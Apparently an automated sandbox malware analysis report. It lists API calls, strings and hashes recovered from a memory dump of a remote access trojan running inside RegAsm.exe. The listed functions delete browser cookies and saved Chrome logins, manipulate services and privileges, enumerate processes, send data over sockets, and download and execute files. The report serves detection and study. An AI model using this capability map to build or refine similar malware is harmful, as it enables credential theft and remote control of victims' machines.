\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 00408214
UserProfile, xrefs: 00408222
\cookies.sqlite, xrefs: 0040831A
[Firefox cookies found, cleared!], xrefs: 004083CB
[Firefox Cookies not found], xrefs: 00408292, 0040838A

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: 3969a7a6a5acbe83f6a9b0f1ee1c88604edab17d60d8180c022af7f0b181ac56
Instruction ID: 00a5acec732576bc5cbb70c497211a5f1a220084e487e38eff3f49032b11243d
Opcode Fuzzy Hash: 3969a7a6a5acbe83f6a9b0f1ee1c88604edab17d60d8180c022af7f0b181ac56
Instruction Fuzzy Hash: F941C6309002159ACB14FB75DD5A9EEB734AF51704F5000BFF946B21C2EF7C4A89C699

Function 004124EF Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON

Download Yara Rule

Strings

6, xrefs: 004126DB
1, xrefs: 0041255D
5, xrefs: 004126D1
7, xrefs: 004126F2
3, xrefs: 0041261C
2, xrefs: 004125BC
4, xrefs: 00412680
0, xrefs: 00412519

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: 1777e788168ca64476a4a3adf89150e5c85b8ad296c37a0fb6fbfb00c5940eff
Instruction ID: d49e1bb01a71b31e9a514e8ab9d79bfde0f8a8990e09ce8f733d3f3a0fa78d10
Opcode Fuzzy Hash: 1777e788168ca64476a4a3adf89150e5c85b8ad296c37a0fb6fbfb00c5940eff
Instruction Fuzzy Hash: E271F2B05083029ED315EF21C9A6FAB7794AF44310F10492FF692A72D1DAB89D8DC75B

Function 00412E96 Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00468490), ref: 00412EAD
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,004129B7), ref: 00412EF4
GetLastError.KERNEL32 ref: 00412F02
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,004129B7), ref: 00412F33
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,0045F170,00000000,0045F170,00000000,0045F170), ref: 00413003

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID:
API String ID: 2247270020-0
Opcode ID: 2cc3bf881d0ae6e0524c004e94dd5b10cceb50f847b089947975b433809224c4
Instruction ID: 67645d11a30bc640d3fdd44f05f185ca840b8eb7349b3fd14ad573a0dba1d346
Opcode Fuzzy Hash: 2cc3bf881d0ae6e0524c004e94dd5b10cceb50f847b089947975b433809224c4
Instruction Fuzzy Hash: BD815B31D00119ABCB19EFA1DC569EEB738AF14309F20802AF50677191EF786F49CB68

Function 00414795 Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
FindNextFileW.KERNEL32(00000000,?), ref: 00414863
RemoveDirectoryW.KERNEL32(?), ref: 004148DD
FindClose.KERNEL32(00000000), ref: 0041490B
RemoveDirectoryW.KERNEL32(?), ref: 00414914
SetFileAttributesW.KERNEL32(?,00000080), ref: 00414931
DeleteFileW.KERNEL32(?), ref: 0041493E
GetLastError.KERNEL32 ref: 00414966
FindClose.KERNEL32(00000000), ref: 00414979

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
Instruction ID: 67d1b46c084ba7a1db363377ae0973eb7806ada5b67af0ef92577c41b38a644f
Opcode Fuzzy Hash: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
Instruction Fuzzy Hash: B3513B799002598ACF24EF78C8446FBB375FF95304F5041EAE84597250EB758EC6CB58

Function 0040D9A0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA73
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA7F

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0040DC4F
GetProcAddress.KERNEL32(00000000), ref: 0040DC56

Strings

Shlwapi.dll, xrefs: 0040DC4A
SHDeleteKeyW, xrefs: 0040DC45

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: af0e16ad968799b6e11fc92488445b6700a19d3771c28130d7b534f1ab2459b3
Instruction ID: 4074bb3242a5131e9af16332fb1fca2d579f27d95419dd5672c9eea20478749a
Opcode Fuzzy Hash: af0e16ad968799b6e11fc92488445b6700a19d3771c28130d7b534f1ab2459b3
Instruction Fuzzy Hash: 05C1F872A1430066C604BB76CD5B96E36A99F95748F40093FF606BB1D3ED7C9A0CC39A

Function 00444821 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044492D
IsValidCodePage.KERNEL32(00000000), ref: 00444988
IsValidLocale.KERNEL32(?,00000001), ref: 00444997
GetLocaleInfoW.KERNEL32(?,00001001,0043A13A,00000040,?,0043A25A,00000055,00000000,?,?,00000055,00000000), ref: 004449DF
GetLocaleInfoW.KERNEL32(?,00001002,0043A1BA,00000040), ref: 004449FE

Strings

|9E, xrefs: 00444886

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: |9E
API String ID: 745075371-2862116995
Opcode ID: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
Instruction ID: a0d23eae2eab3cce0e6143c8aade0d1d31ecb2808b135d4201b82ffc1078fed3
Opcode Fuzzy Hash: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
Instruction Fuzzy Hash: BD5181B1900219ABFF10EFB5DC46BBF73B8EF89701F04016AE910E7290D77899409B69

Function 0044464D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 004446E6
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 0044470F
GetACP.KERNEL32(?,?,0044496C,?,00000000), ref: 00444724

Strings

lID, xrefs: 00444704, 004446DB
OCP, xrefs: 004446A1
ACP, xrefs: 0044466B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$lID
API String ID: 2299586839-1000943563
Opcode ID: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
Instruction ID: b776c1f794edacfa1d566d42b41839c959f8c97492637f1cf3d15b7234cf2928
Opcode Fuzzy Hash: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
Instruction Fuzzy Hash: F421C462A00101AAF7308F64C800B97B3A6FFD6B55B578166E80AC7310FB3EDE41C758

Function 00407EC0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00407EFC
GetLastError.KERNEL32 ref: 00407F06

Strings

[Chrome StoredLogins found, cleared!], xrefs: 00407F2C
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407EC7
UserProfile, xrefs: 00407ECC
[Chrome StoredLogins not found], xrefs: 00407F20

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 955f6442eeeee9758db619c44b27432ff1b1cda597301cc4e142a3ad0763b2b6
Instruction ID: cd3047e91bfde3af176f2c882389411367fa10c8d8f2a88c8bde0a27d8164f9d
Opcode Fuzzy Hash: 955f6442eeeee9758db619c44b27432ff1b1cda597301cc4e142a3ad0763b2b6
Instruction Fuzzy Hash: 38012631E941069BCA04BBB5CE1B8EE7724A961305F50017FFA02731D2ED7E5909C2DB

Function 00410D25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,00000026,00000000,?,?,?,0040FC02,00000026), ref: 00410D32
OpenProcessToken.ADVAPI32(00000000,?,?,?,0040FC02,00000026), ref: 00410D39
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00410D4B
AdjustTokenPrivileges.ADVAPI32(00000026,00000000,?,00000000,00000000,00000000), ref: 00410D6A
GetLastError.KERNEL32 ref: 00410D70

Strings

SeShutdownPrivilege, xrefs: 00410D45

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
Instruction ID: 9eef06880bab16d35be2c706b8c727757efcd913256d8b96f55afeb896bd8697
Opcode Fuzzy Hash: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
Instruction Fuzzy Hash: 3FF03A75901128ABDB109BA0ED0DEEF7FBCEF06219F104061B905A2051D6744A09CAB5

Function 004476F8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0044783E

Strings

1#INF, xrefs: 00448A4B
1#SNAN, xrefs: 00448A3D
1#QNAN, xrefs: 00448A44
1#IND, xrefs: 00448A36

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
Instruction ID: 4aadb4acba26e1cacb22562d3062cd2e5fa0d248af99932944c2a23c9cbf1606
Opcode Fuzzy Hash: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
Instruction Fuzzy Hash: 75C23C71E086288FEB65CE289D407EEB7B5EB44305F1545EBD40DE7240EB78AE828F45

Function 004072E5 Relevance: 9.3, APIs: 6, Instructions: 316fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004072EA

Part of subcall function 0040170E: connect.WS2_32(?,?,?), ref: 00401726

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

__CxxThrowException@8.LIBVCRUNTIME ref: 00407382
FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004073E0
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00407438
FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?), ref: 0040744F

Part of subcall function 00401C4F: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C59
Part of subcall function 00401C4F: SetEvent.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C68
Part of subcall function 00401C4F: CloseHandle.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C71

FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0040768B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$File$EventException@8FirstH_prologHandleNextObjectSingleThrowWaitconnectsend
String ID:
API String ID: 4178801697-0
Opcode ID: 36b91f3074bc9f6177dafd4d385a894127f1efee58712ea95ac6801be2b5ffbd
Instruction ID: 7202f6ce65fafa98fb7de63047c39e51e87502bb610d5f7c02fe3bbf75a70c5a
Opcode Fuzzy Hash: 36b91f3074bc9f6177dafd4d385a894127f1efee58712ea95ac6801be2b5ffbd
Instruction Fuzzy Hash: C0C1AC319001089BDB14EB60CD92AEE7779AF10318F50417EE906B71E1EB38AF49CB99

Function 00413168 Relevance: 9.0, APIs: 6, Instructions: 42serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00412DF3,00000000), ref: 00413174
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00412DF3,00000000), ref: 00413188
CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 00413195
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00412DF3,00000000), ref: 004131A0
CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B2
CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B5

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
Instruction ID: 728c1f078413431713c18eccfbc5b09ab83812d1f123983b22c07ece6b5a69bb
Opcode Fuzzy Hash: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
Instruction Fuzzy Hash: C6F0B4795011287FE2116F259C89DBF3B6CDF863AAF040026F90993140CE788E86A5B8

Function 00443EE9 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043A141,?,?,?,?,00439B98,?,00000004), ref: 00443FCB
_wcschr.LIBVCRUNTIME ref: 0044405B
_wcschr.LIBVCRUNTIME ref: 00444069
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043A141,00000000,0043A261), ref: 0044410C

Strings

|9E, xrefs: 00443F27

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: |9E
API String ID: 4212172061-2862116995
Opcode ID: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
Instruction ID: 32e737dee43cd030fe8cef7ac27ade77768f3db5fce4e08c52ba53364ae33a46
Opcode Fuzzy Hash: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
Instruction Fuzzy Hash: A861FA71A00206AAF724AF76CC42BBB73A8EF44715F14052FFA05D7281EB78DD458769

Function 00413B85 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 00413B96
LoadResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BAA
LockResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BB1
SizeofResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BC0

Strings

SETTINGS, xrefs: 00413B89

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 263d98506411805d18de30793c85a23ac3b7c2f73439d8eab52d1c55755b40a5
Instruction ID: bd5ac476d8bf3fa726269e040eb6de6ac2e9741c8027eb8ad6766d5099f1ebf2
Opcode Fuzzy Hash: 263d98506411805d18de30793c85a23ac3b7c2f73439d8eab52d1c55755b40a5
Instruction Fuzzy Hash: 77E04F7EA00610AFD7212FE1AC8CD0B7EB9E7CAB52B140235FD01D7221EA768804CF59

Function 00407733 Relevance: 7.7, APIs: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407738

Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004077B0
FindNextFileW.KERNEL32(00000000,?), ref: 004077D9
FindClose.KERNEL32(000000FF), ref: 004077F0

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNextchar_traits
String ID:
API String ID: 3260228402-0
Opcode ID: f2aeaa72d40e209b9df2b53be886cf0538c035a11609dda0921907f97889bebc
Instruction ID: a5bca9eea51d8a3269136c205410c130ed0051bea8ed056c38eb20d9fbddcba5
Opcode Fuzzy Hash: f2aeaa72d40e209b9df2b53be886cf0538c035a11609dda0921907f97889bebc
Instruction Fuzzy Hash: 8E9159329000199BCB15FFA1CC929EE7779AF10348F14417BE906B71E1EB39AB49CB59

Function 00405C8E Relevance: 7.7, APIs: 5, Instructions: 210fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405C93
FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
__CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE1

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 1ffb65496f04ba71f834cbdae29f4aed766495b45e8c774fa02ac9e33f1099c4
Instruction ID: 644df84be1dd51f3e46be0d0b0f2c3143fee40e79e208979b12aa7b8aebd657c
Opcode Fuzzy Hash: 1ffb65496f04ba71f834cbdae29f4aed766495b45e8c774fa02ac9e33f1099c4
Instruction Fuzzy Hash: C0715C71900109AACB04FF61DD569EE7769EF20348F50417BF906B71D2EB38AB49CB98

Function 0040CB6C Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C60C: SetLastError.KERNEL32(0000000D,0040CB8B,00000000,00000000,?), ref: 0040C612

SetLastError.KERNEL32(000000C1,00000000,00000000,?), ref: 0040CBA2
GetNativeSystemInfo.KERNEL32(?,00000000,00000000,?), ref: 0040CC15
GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040CC81
HeapAlloc.KERNEL32(00000000), ref: 0040CC88
SetLastError.KERNEL32(0000045A), ref: 0040CD9A

Part of subcall function 0040CB1F: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040CCA1,00000000,00000000,00008000,00000000), ref: 0040CB2B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
String ID:
API String ID: 486403682-0
Opcode ID: 4adddcbbc2acc18d42834cc587bd1a751958d041fb9292e9324df411bf8be2ea
Instruction ID: e6e8c6485ed81cd1fca12390261a6ee4e02eb1f9f339570914d2f341853158c0
Opcode Fuzzy Hash: 4adddcbbc2acc18d42834cc587bd1a751958d041fb9292e9324df411bf8be2ea
Instruction Fuzzy Hash: F361CF70A00201EBDB109F66C9C2B6ABBB5BF84704F14427AE905BB7C1D77CE941CB99

Function 00414D7F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74

Part of subcall function 0040D202: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
Part of subcall function 0040D202: RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D239
Part of subcall function 0040D202: RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D244

Strings

WallpaperStyle, xrefs: 00414DBF, 00414DF2, 00414E42
TileWallpaper, xrefs: 00414E5E
Control Panel\Desktop, xrefs: 00414DBA, 00414DED, 00414E3D

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: bd12275f3f6cd1d669989ca051e00a63e2fdd3ef9dd0543eca36a2463057cf65
Instruction ID: bb2a44e1ed6c38dfa1a502633be872de791d5c7f5d259041969d25b46d9350ba
Opcode Fuzzy Hash: bd12275f3f6cd1d669989ca051e00a63e2fdd3ef9dd0543eca36a2463057cf65
Instruction Fuzzy Hash: F111A172B8030077D909303A0D5BFAE2C159B92B52F95016BFE017A2D7E9DE4A9903CF

Function 004320EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321E4
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321EE
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321FB

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00432105

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 3906539128-1068371695
Opcode ID: 17a952e660d70814d57f60f7e6f4e4c9fa82c9629f664b16cd2a329d852c6d80
Instruction ID: 35e80af348abaaee4114425dc0c0632cf56bb04d932113a279ddada4047cb47e
Opcode Fuzzy Hash: 17a952e660d70814d57f60f7e6f4e4c9fa82c9629f664b16cd2a329d852c6d80
Instruction Fuzzy Hash: 7D31D574D412289BCB21DF65DD89B9DB7B8BF08310F5042EAE81CA7251E7749B818F49

Function 0040A7FF Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON

Download Yara Rule

APIs

Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000000,?,00000002,0040907E,WinDir,00000000,00000000), ref: 00414463

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A81F
Process32FirstW.KERNEL32(00000000,?), ref: 0040A841
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A9C8
CloseHandle.KERNEL32(00000000), ref: 0040A9D7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
String ID:
API String ID: 592884611-0
Opcode ID: 56ed749abff6f236e056cd0dd77af98e6714c1e0ba7085316581fe8596d45ad3
Instruction ID: 243f6cd1f81f9c8f55a8f0024b00723f56764068984f0561bc3222dd9606701d
Opcode Fuzzy Hash: 56ed749abff6f236e056cd0dd77af98e6714c1e0ba7085316581fe8596d45ad3
Instruction Fuzzy Hash: 6B412031A102299BC715FB61DC56AEEB378AF50304F1040BFF60A761D2EE785EC9CA59

Function 00404A3B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00404B51
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00404BE8

Strings

open, xrefs: 00404B4B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: open
API String ID: 2825088817-2758837156
Opcode ID: 3fb3a80cf2e6475b59f25c82e33835eae668523d95a8c683cc80ed935d5ac12b
Instruction ID: e27ae4924a228426fb0fa60c58d648a9e47e27aaaaa9c80784e0ca9243a57cd1
